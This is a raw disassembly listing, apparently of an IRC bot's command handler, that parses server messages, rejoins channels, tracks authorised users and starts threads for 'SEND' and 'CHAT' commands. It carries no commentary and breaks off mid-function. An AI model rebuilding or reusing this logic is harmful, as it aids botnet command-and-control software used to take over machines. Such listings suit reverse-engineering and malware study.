var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = dword ptr -2658h
var_2654 = byte ptr -2654h
var_25D4 = byte ptr -25D4h
var_24D4 = byte ptr -24D4h
var_23D4 = dword ptr -23D4h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = dword ptr -23B0h
var_23AC = byte ptr -23ACh
var_232C = byte ptr -232Ch
var_22AC = byte ptr -22ACh
var_222C = dword ptr -222Ch
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
var_221C = dword ptr -221Ch
var_2218 = byte ptr -2218h
var_2198 = byte ptr -2198h
var_2118 = byte ptr -2118h
var_2098 = dword ptr -2098h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = dword ptr -2088h
var_2084 = byte ptr -2084h
var_2004 = byte ptr -2004h
var_1F84 = byte ptr -1F84h
var_1F04 = dword ptr -1F04h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
var_1EF8 = dword ptr -1EF8h
var_1EF4 = dword ptr -1EF4h
var_1EF0 = byte ptr -1EF0h
var_1DF0 = byte ptr -1DF0h
var_1D70 = dword ptr -1D70h
var_1D68 = dword ptr -1D68h
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D54 = dword ptr -1D54h
var_1D4C = byte ptr -1D4Ch
var_1D38 = byte ptr -1D38h
var_1C34 = byte ptr -1C34h
var_1BB0 = dword ptr -1BB0h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1BA0 = dword ptr -1BA0h
var_1B98 = byte ptr -1B98h
var_1B84 = byte ptr -1B84h
var_1A80 = byte ptr -1A80h
var_1A00 = dword ptr -1A00h
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = dword ptr -19ECh
var_19E8 = byte ptr -19E8h
var_1968 = byte ptr -1968h
var_1928 = byte ptr -1928h
var_1828 = dword ptr -1828h
var_1824 = dword ptr -1824h
var_1818 = dword ptr -1818h
var_1814 = dword ptr -1814h
var_1810 = dword ptr -1810h
var_180C = byte ptr -180Ch
var_17D4 = byte ptr -17D4h
var_17B8 = byte ptr -17B8h
var_1780 = byte ptr -1780h
var_177C = byte ptr -177Ch
var_16FC = byte ptr -16FCh
var_16BC = byte ptr -16BCh
var_162C = dword ptr -162Ch
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = byte ptr -1618h
var_1598 = byte ptr -1598h
var_1518 = dword ptr -1518h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = dword ptr -150Ch
var_1508 = byte ptr -1508h
var_14F8 = byte ptr -14F8h
var_1478 = byte ptr -1478h
var_13F8 = dword ptr -13F8h
var_13F0 = dword ptr -13F0h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = dword ptr -13DCh
var_13D8 = byte ptr -13D8h
var_1358 = byte ptr -1358h
var_12D8 = byte ptr -12D8h
var_1258 = dword ptr -1258h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_123C = dword ptr -123Ch
var_1234 = byte ptr -1234h
var_11B4 = byte ptr -11B4h
var_1134 = dword ptr -1134h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1124 = dword ptr -1124h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1114 = dword ptr -1114h
var_1110 = byte ptr -1110h
var_1090 = byte ptr -1090h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1000 = dword ptr -1000h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = byte ptr -0FECh
var_F6C = dword ptr -0F6Ch
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = dword ptr -0F5Ch
var_F58 = byte ptr -0F58h
var_ED8 = dword ptr -0ED8h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = dword ptr -0EC8h
var_EC4 = byte ptr -0EC4h
var_E44 = dword ptr -0E44h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = dword ptr -0E38h
var_E34 = byte ptr -0E34h
var_E24 = byte ptr -0E24h
var_E04 = byte ptr -0E04h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D00 = byte ptr -0D00h
var_C80 = dword ptr -0C80h
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = byte ptr -0C5Ch
var_BDC = dword ptr -0BDCh
var_BD8 = dword ptr -0BD8h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = dword ptr -0BCCh
var_BC8 = dword ptr -0BC8h
var_BC4 = byte ptr -0BC4h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = dword ptr -0B34h
var_B30 = dword ptr -0B30h
var_B2C = byte ptr -0B2Ch
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = dword ptr -0A9Ch
var_A98 = dword ptr -0A98h
var_A94 = dword ptr -0A94h
var_A90 = byte ptr -0A90h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = dword ptr -0A04h
var_A00 = dword ptr -0A00h
var_9FC = byte ptr -9FCh
var_97C = word ptr -97Ch
var_978 = dword ptr -978h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_960 = byte ptr -960h
var_8FF = byte ptr -8FFh
var_8FE = byte ptr -8FEh
var_8FC = byte ptr -8FCh
var_8FB = byte ptr -8FBh
var_8F2 = byte ptr -8F2h
var_8F0 = byte ptr -8F0h
var_8EE = byte ptr -8EEh
var_8ED = byte ptr -8EDh
var_860 = byte ptr -860h
var_850 = byte ptr -850h
var_7D0 = byte ptr -7D0h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_734 = dword ptr -734h
var_730 = dword ptr -730h
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_714 = dword ptr -714h
var_710 = byte ptr -710h
var_690 = dword ptr -690h
var_688 = dword ptr -688h
var_684 = dword ptr -684h
var_680 = dword ptr -680h
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_668 = dword ptr -668h
var_63C = dword ptr -63Ch
var_638 = word ptr -638h
var_624 = dword ptr -624h
var_620 = byte ptr -620h
var_5A0 = byte ptr -5A0h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_574 = dword ptr -574h
var_570 = byte ptr -570h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4D8 = dword ptr -4D8h
var_4D4 = dword ptr -4D4h
var_4D0 = dword ptr -4D0h
Drive = byte ptr -4C8h
var_4BC = byte ptr -4BCh
var_484 = byte ptr -484h
var_474 = byte ptr -474h
var_3F4 = byte ptr -3F4h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
Str1 = byte ptr -338h
var_31C = word ptr -31Ch
var_31A = word ptr -31Ah
var_318 = dword ptr -318h
var_30C = byte ptr -30Ch
Count = dword ptr -308h
var_2FC = byte ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2E8 = byte ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2E3 = byte ptr -2E3h
var_2E2 = byte ptr -2E2h
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
Dst = byte ptr -2C4h
var_C4 = byte ptr -0C4h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
SubStr = byte ptr -0A0h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_90 = dword ptr -90h
Args = byte ptr -8Ch
Format = dword ptr -88h
Str2 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_50 = byte ptr -50h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Source = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
File = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 568Ch
call __alloca_probe
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_AC], 3
mov [ebp+var_10], ebx
mov [ebp+var_A4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_2C8], ebx
call _memset
push 1Bh ; Count
lea eax, [ebp+Str1]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 18h
cmp [ebp+Src], ebx
jz loc_401F75
push esi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
dec esi
lea eax, [ebp+Str]
push esi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Str]
push offset SubStr ; " :"
push eax ; Str
call _strstr
mov [ebp+var_C], eax
lea eax, [ebp+Str]
push esi ; Count
push eax ; Source
lea eax, [ebp+var_4EF8]
push eax ; Dest
call _strncpy
mov esi, offset asc_42CDC0 ; " "
lea eax, [ebp+var_4EF8]
push esi ; Delim
push eax ; Str
call _strtok
add esp, 34h
mov [ebp+var_90], eax
lea edi, [ebp+Args]
mov [ebp+var_A8], 1Fh
loc_401BA0: ; CODE XREF: sub_401ACD+E7�j
push esi ; Delim
push ebx ; Str
call _strtok
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_A8]
pop ecx
jnz short loc_401BA0
mov esi, [ebp+var_90]
cmp esi, ebx
jz loc_401F75
cmp dword ptr [ebp+Args], ebx
jz loc_401F75
push 100h ; Size
lea eax, [ebp+var_960]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea ecx, [ebp+var_14]
push 1Fh
pop edx
push 1
pop edi
loc_401BEE: ; CODE XREF: sub_401ACD+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_401C1A
cmp byte ptr [eax], 2Dh
jnz short loc_401C22
cmp [eax+2], bl
jnz short loc_401C22
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_960], 1
mov esi, [ebp+var_90]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_401C1A: ; CODE XREF: sub_401ACD+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_401BEE
loc_401C22: ; CODE XREF: sub_401ACD+12A�j
; sub_401ACD+12F�j
cmp [ebp+var_8ED], bl
jz short loc_401C2D
mov [ebp+var_8], edi
loc_401C2D: ; CODE XREF: sub_401ACD+15B�j
cmp [ebp+var_8F2], bl
jz short loc_401C3B
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_401C3B: ; CODE XREF: sub_401ACD+166�j
cmp byte ptr [esi], 0Ah
jz short loc_401C75
push 7Fh ; Count
lea eax, [ebp+var_E04]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [esi+1]
push 17h ; Count
push eax ; Source
lea eax, [ebp+var_C4]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C4]
push offset Delim ; "!"
push eax ; Str
call _strtok
add esp, 20h
loc_401C75: ; CODE XREF: sub_401ACD+171�j
push esi ; Str2
push offset aPing ; "PING"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401CC6
push dword ptr [ebp+Args] ; Args
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_401D6A
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 10h
jmp loc_401D6A
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401ACD+1B7�j
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset a001 ; "001"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097D7
push esi ; Str2
push offset a005 ; "005"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097D7
push esi ; Str2
push offset a302_0 ; "302"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401D2E
push offset a@ ; "@"
push [ebp+Str2] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_401D6A
inc eax
push 9Fh ; Count
push eax ; Source
push [ebp+arg_1C] ; Dest
call _strncpy
jmp short loc_401D67
; ---------------------------------------------------------------------------
loc_401D2E: ; CODE XREF: sub_401ACD+238�j
push esi ; Str2
push offset a433 ; "433"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401D71
push ebx ; Str1
push dword_4290A0 ; int
push dword_42909C ; int
push [ebp+Source] ; Dest
call sub_40AE84
add esp, 10h
push [ebp+Source] ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
loc_401D67: ; CODE XREF: sub_401ACD+25F�j
add esp, 0Ch
loc_401D6A: ; CODE XREF: sub_401ACD+1D8�j
; sub_401ACD+1F4�j ...
mov eax, edi
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_401D71: ; CODE XREF: sub_401ACD+270�j
mov esi, [ebp+arg_18]
mov [ebp+var_A8], 3
mov edi, 80h
loc_401D83: ; CODE XREF: sub_401ACD+2DB�j
lea eax, [ebp+var_E04]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401DA0
mov [ebp+var_A4], 1
loc_401DA0: ; CODE XREF: sub_401ACD+2C7�j
add esi, edi
dec [ebp+var_A8]
jnz short loc_401D83
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset aKick ; "KICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_401E9A
mov esi, [ebp+arg_18]
mov [ebp+File], 3
loc_401DCF: ; CODE XREF: sub_401ACD+392�j
cmp [esi], bl
jz loc_401E5A
push 7Fh ; Count
lea eax, [ebp+var_E04]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C4]
add esp, 0Ch
test eax, eax
jz short loc_401E5A
cmp [ebp+Str2], ebx
jz short loc_401E5A
push [ebp+Str2] ; Str2
lea eax, [ebp+var_C4]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401E5A
lea eax, [ebp+var_C4]
mov [esi], bl
push eax
lea eax, [ebp+Dst]
push offset unk_42CD50 ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4] ; int
call sub_409823
lea eax, [ebp+Dst]
push eax
call sub_415D38
add esp, 14h
loc_401E5A: ; CODE XREF: sub_401ACD+304�j
; sub_401ACD+324�j ...
add esi, edi
dec [ebp+File]
jnz loc_401DCF
push [ebp+Str2] ; Str2
push [ebp+Source] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_401F75
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8] ; Args
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_401E8D: ; CODE XREF: sub_401ACD+5F6�j
; sub_401ACD+8B9�j ...
push [ebp+arg_4] ; int
call sub_409823
jmp loc_404260
; ---------------------------------------------------------------------------
loc_401E9A: ; CODE XREF: sub_401ACD+2F2�j
push esi ; Str2
push offset aNick ; "NICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_401FDD
mov eax, [ebp+Format]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+Src], 3
mov [ebp+File], eax
loc_401EC3: ; CODE XREF: sub_401ACD+448�j
lea eax, [ebp+var_E04]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F10
lea eax, [ebp+var_E04]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_401F10
push [ebp+File] ; Source
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax ; Dest
call _strcpy
push [ebp+arg_1C] ; Source
push edi ; Dest
call _strcat
add esp, 10h
mov edi, 80h
loc_401F10: ; CODE XREF: sub_401ACD+407�j
; sub_401ACD+41E�j
add esi, edi
dec [ebp+Src]
jnz short loc_401EC3
lea eax, [ebp+var_C4]
test eax, eax
jz short loc_401F75
cmp [ebp+File], ebx
jz short loc_401F75
push [ebp+Source] ; Str2
lea eax, [ebp+var_C4]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F4D
push 0Fh ; Count
push [ebp+File] ; Source
push [ebp+Source] ; Dest
call _strncpy
jmp loc_4036A2
; ---------------------------------------------------------------------------
loc_401F4D: ; CODE XREF: sub_401ACD+46C�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_401F52: ; CODE XREF: sub_401ACD+4A6�j
cmp [edi], bl
jz short loc_401F69
lea eax, [ebp+var_E04]
push eax ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_401F7D
loc_401F69: ; CODE XREF: sub_401ACD+487�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_401F52
loc_401F75: ; CODE XREF: sub_401ACD+5B�j
; sub_401ACD+F1�j ...
push 1
loc_401F77: ; CODE XREF: sub_401ACD+2A1E�j
pop eax
loc_401F78: ; CODE XREF: sub_401ACD+29F�j
; sub_401ACD+2A40�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401F7D: ; CODE XREF: sub_401ACD+49A�j
lea eax, [ebp+var_E04]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+Src], eax
jz short loc_401F75
push eax ; Str
call _strlen
push [ebp+File] ; Str
mov edi, eax
call _strlen
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_401F75
push [ebp+Src]
shl esi, 7
push [ebp+File]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+var_45F0]
push ebx ; int
push eax ; int
push [ebp+arg_8] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 24h
jmp short loc_401F75
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401ACD+3DC�j
push esi ; Str2
push offset aPart ; "PART"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_401FFF
push esi ; Str2
push offset aQuit ; "QUIT"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402026
loc_401FFF: ; CODE XREF: sub_401ACD+51F�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_402004: ; CODE XREF: sub_401ACD+557�j
cmp [edi], bl
jz short loc_40201A
push [ebp+var_90] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402067
loc_40201A: ; CODE XREF: sub_401ACD+539�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402004
loc_402026: ; CODE XREF: sub_401ACD+530�j
push dword ptr [ebp+Args] ; Str2
push offset a353 ; "353"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4020C8
push [ebp+var_80] ; Str2
push [ebp+arg_8] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40205A
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40205A: ; CODE XREF: sub_401ACD+582�j
push [ebp+var_80]
push offset unk_42CCFC
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_402067: ; CODE XREF: sub_401ACD+54B�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+Dst]
push offset unk_42CCDC ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415D38
push dword ptr [ebp+Args] ; Str2
push offset aPart ; "PART"
call _strcmp
add esp, 18h
test eax, eax
jnz loc_401F75
lea eax, [ebp+Dst]
push eax
mov eax, [ebp+var_90]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_401E8D
; ---------------------------------------------------------------------------
loc_4020C8: ; CODE XREF: sub_401ACD+56D�j
push dword ptr [ebp+Args] ; Str2
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi ; Str1
call _strcmp
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_40211C
push dword ptr [ebp+Args] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40211C
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409644
cmp dword_429088, ebx
jz loc_409644
loc_40211C: ; CODE XREF: sub_401ACD+615�j
; sub_401ACD+627�j
push dword ptr [ebp+Args] ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4022A2
push dword ptr [ebp+Args] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4022A2
mov eax, [ebp+Str2]
inc [ebp+var_80]
push 4
mov [ebp+Format], eax
pop esi
mov [ebp+var_AC], esi
loc_402160: ; CODE XREF: sub_401ACD+891�j
; sub_401ACD+8CD�j ...
shl esi, 2
mov eax, [ebp+esi+var_90]
lea edi, [ebp+esi+var_90]
push eax ; Str2
push offset dword_42CCC0 ; Str1
mov [ebp+arg_8], eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40253B
push dword ptr [ebp+esi+Args] ; Str2
push offset aSend ; "SEND"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402402
cmp [ebp+var_A4], ebx
jz loc_4023DB
push [ebp+esi+Format]
mov edi, offset aS_6 ; "%s"
lea eax, [ebp+var_1B84]
push edi ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_1B98]
push [ebp+esi+Str2]
push edi ; Format
push eax ; Dest
call _sprintf
push [ebp+esi+var_80] ; Str
call _atoi
mov [ebp+var_1A00], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1BA0], eax
lea eax, [ebp+var_C4]
push 7Fh ; Count
push eax ; Source
lea eax, [ebp+var_1A80]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_19F8], eax
mov eax, [ebp+var_8]
mov [ebp+var_19F4], eax
lea eax, [ebp+var_1A80]
push eax
lea eax, [ebp+var_1B84]
push eax
lea eax, [ebp+Dst]
push offset asc_42CC84 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ah ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_19FC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1BA0]
push ebx
push eax
push offset sub_416563
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_19FC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz loc_4023CA
loc_40228C: ; CODE XREF: sub_401ACD+7D3�j
cmp [ebp+var_19F0], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40228C
; ---------------------------------------------------------------------------
loc_4022A2: ; CODE XREF: sub_401ACD+65F�j
; sub_401ACD+675�j
push dword ptr [ebp+Args] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4022BB
mov [ebp+var_4], 1
loc_4022BB: ; CODE XREF: sub_401ACD+7E5�j
cmp [ebp+Format], ebx
jz loc_401F75
push offset asc_42CC80 ; "#"
push [ebp+Format] ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4022E2
cmp [ebp+var_4], ebx
jz short loc_4022EE
loc_4022E2: ; CODE XREF: sub_401ACD+80E�j
lea eax, [ebp+var_C4]
mov [ebp+Format], eax
loc_4022EE: ; CODE XREF: sub_401ACD+813�j
cmp [ebp+Str2], ebx
jz loc_401F75
inc [ebp+Str2]
jz short loc_40233A
cmp [ebp+Source], ebx
jz short loc_40233A
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
push eax ; MaxCount
lea eax, [ebp+Str1]
push [ebp+Str2] ; Str2
push eax ; Str1
call _strncmp
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_AC], esi
jmp short loc_402340
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_401ACD+833�j
; sub_401ACD+838�j
mov esi, [ebp+var_AC]
loc_402340: ; CODE XREF: sub_401ACD+86B�j
mov edi, [ebp+esi*4+var_90]
cmp edi, ebx
jz loc_401F75
push edi ; Str2
push offset dword_42CC74 ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402160
mov ecx, [ebp+Format]
cmp byte ptr [ecx], 23h
jz short loc_40238B
mov eax, dword_4CB888
mov eax, off_429160[eax*4]
cmp [eax], bl
jz short loc_40238B
push eax
push ecx
push offset dword_42CC58
jmp loc_401E8D
; ---------------------------------------------------------------------------
loc_40238B: ; CODE XREF: sub_401ACD+8A0�j
; sub_401ACD+8B0�j
push edi ; Str2
push offset dword_42CC50 ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402160
mov eax, dword ptr [ebp+esi*4+Args]
cmp eax, ebx
jz loc_402160
mov ecx, [ebp+Format]
cmp byte ptr [ecx], 23h
jz loc_402160
push eax
push ecx
push offset dword_42CC38
jmp loc_401E8D
; ---------------------------------------------------------------------------
loc_4023CA: ; CODE XREF: sub_401ACD+7B9�j
; sub_401ACD+76B7�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42CBFC
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_4023DB: ; CODE XREF: sub_401ACD+6DD�j
lea eax, [ebp+var_C4]
push eax
push [ebp+esi+Format]
push offset asc_42CBB8 ; "-"
loc_4023EE: ; CODE XREF: sub_401ACD+7C19�j
; sub_401ACD+7C80�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
jmp loc_4082DE
; ---------------------------------------------------------------------------
loc_402402: ; CODE XREF: sub_401ACD+6D1�j
push dword ptr [ebp+esi+Args] ; Str2
push offset aChat ; "CHAT"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402551
cmp [ebp+var_A4], ebx
jz loc_40252A
push 1Bh
call sub_40B602
test eax, eax
pop ecx
jnz loc_402519
push [ebp+esi+Str2]
lea eax, [ebp+var_2AAC]
push offset aS_6 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+esi+var_80] ; Str
call _atoi
mov [ebp+var_2914], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2AB4], eax
lea eax, [ebp+var_C4]
push 7Fh ; Count
push eax ; Source
lea eax, [ebp+var_2994]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_290C], eax
